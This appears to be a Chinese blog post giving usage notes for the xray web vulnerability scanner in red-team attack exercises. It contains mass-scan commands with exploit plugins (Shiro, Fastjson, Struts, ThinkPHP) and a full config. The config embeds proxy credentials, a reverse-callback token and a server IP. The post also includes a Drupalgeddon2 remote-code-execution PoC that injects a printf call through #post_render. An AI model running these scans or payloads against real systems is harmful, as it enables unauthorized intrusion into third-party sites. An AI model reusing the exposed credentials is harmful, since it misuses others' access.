xray 1.7.1 专业版
低情商:我们攻击噪音特别大
高情商:我们攻击poc覆盖特别广
使用命令参考
使用代理模式进行扫描
当目标多的时候,只跑少数几个poc
| xray_windows_amd64_protected.exe --config config-hillstone.yaml webscan --url-file url.txt --plugin shiro,fastjson,struts,thinkphp,phantasm --html-output jiangsuHW_2.html
|
config-hillstone.yaml
注意修改proxy的字段
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226
| version: 4.0
parallel: 30
http: proxy: "http://redTeamProxyPool:AnhZGtgfsttvnku6@40.73.244.29:58080" proxy_rule: [] dial_timeout: 30 read_timeout: 30 max_conns_per_host: 50 enable_http2: false fail_retries: 5 max_redirect: 5 max_resp_body_size: 2097152 max_qps: 500 allow_methods: - HEAD - GET - POST - PUT - PATCH - DELETE - OPTIONS - CONNECT - TRACE - MOVE - PROPFIND headers: User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
plugins: baseline: enabled: true detect_cors_header_config: true detect_server_error_page: true detect_system_path_leak: false detect_outdated_ssl_version: false detect_http_header_config: false detect_cookie_httponly: false detect_china_id_card_number: false detect_china_phone_number: false detect_china_bank_card: false detect_private_ip: false brute-force: enabled: true username_dictionary: "" password_dictionary: "" cmd-injection: enabled: true crlf-injection: enabled: true dirscan: enabled: true depth: 1 dictionary: "" fastjson: enabled: true jsonp: enabled: true path-traversal: enabled: true phantasm: enabled: true depth: 1 auto_load_poc: false exclude_poc: [] include_poc: [] redirect: enabled: true shiro: enabled: true cookie_name: rememberMe aes_key: [] sqldet: enabled: true boolean_based_detection: true error_based_detection: true time_based_detection: true use_comment_in_payload: false detect_sqli_in_cookie: true ssrf: enabled: true struts: enabled: true thinkphp: enabled: true detect_thinkphp_sqli: true upload: enabled: true xss: enabled: true detect_xss_in_cookie: true ie_feature: false xxe: enabled: true
reverse: db_file_path: "" token: "Chc23KWRFC2ZbrxR" http: enabled: false listen_ip: 0.0.0.0 listen_port: "8888" ip_header: "" dns: enabled: false listen_ip: 0.0.0.0 domain: "" is_domain_name_server: false resolve: - type: A record: localhost value: 127.0.0.1 ttl: 60 client: remote_server: true http_base_url: "http://40.73.244.29:80" dns_server_ip: "http://40.73.244.29:80"
mitm: ca_cert: ./ca.crt ca_key: ./ca.key basic_auth: username: "thisistheusername" password: "thisisthepassword" allow_ip_range: [] restriction: hostname_allowed: [] hostname_disallowed: - '*google*' - '*github*' port_allowed: [] port_disallowed: [] path_allowed: [] path_disallowed: [] query_key_allowed: [] query_key_disallowed: [] fragment_allowed: [] fragment_disallowed: [] post_key_allowed: [] post_key_disallowed: [] queue: max_length: 3000 proxy_header: via: "" x_forwarded: false upstream_proxy: ""
basic-crawler: max_depth: 0 max_count_of_links: 0 allow_visit_parent_path: false restriction: hostname_allowed: [] hostname_disallowed: - '*google*' - '*github*' port_allowed: [] port_disallowed: [] path_allowed: [] path_disallowed: [] query_key_allowed: [] query_key_disallowed: [] fragment_allowed: [] fragment_disallowed: [] post_key_allowed: [] post_key_disallowed: [] basic_auth: username: "" password: ""
subdomain: max_parallel: 30 allow_recursion: false max_recursion_depth: 3 web_only: false ip_only: false servers: - 8.8.8.8 - 8.8.4.4 - 223.5.5.5 - 223.6.6.6 - 114.114.114.114 sources: brute: enabled: true main_dict: "" sub_dict: "" httpfinder: enabled: true dnsfinder: enabled: true certspotter: enabled: true crt: enabled: true hackertarget: enabled: true qianxun: enabled: true rapiddns: enabled: true sublist3r: enabled: true threatminer: enabled: true virusTotal: enabled: true
|
跑目录下的所有poc
| xray_windows_amd64_protected.exe webscan --url-file url.txt --plugins phantasm --poc "E:\hw\xray跑poc\windows\xray-master\pocs\*" --html-output jiangsuHW_2.html
|
example1
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22
| name: poc-yaml-drupal-drupalgeddon2-rce rules: - method: POST path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]=test%25%25test" headers: User-Agent: "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)" body: | form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password search: | name="form_build_id"\s+value="(.+?)" expression: | status==200 - method: POST path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{1}}" headers: User-Agent: "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)" body: | form_build_id={{1}} expression: | body.bcontains(b'test%test') detail: drupal_version: 7
|
参考资料